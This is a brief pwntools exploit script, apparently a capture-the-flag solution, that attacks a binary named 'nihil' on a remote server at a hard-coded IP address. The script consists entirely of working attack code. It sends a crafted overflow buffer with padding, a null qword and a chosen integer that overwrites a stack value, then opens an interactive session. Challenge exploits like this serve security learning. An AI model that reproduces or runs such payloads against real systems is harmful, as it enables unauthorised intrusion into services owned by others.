#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./nihil", checksec=False)
# r = process()
r = remote("94.72.112.248", 7002)

# funcs
s = lambda a: r.sendlineafter(b"?", a)

# buf
s(b"a")
buf = b"A"*16
buf += p64(0)
buf += b"JUNK"
buf += p32(727)
s(buf)

r.interactive()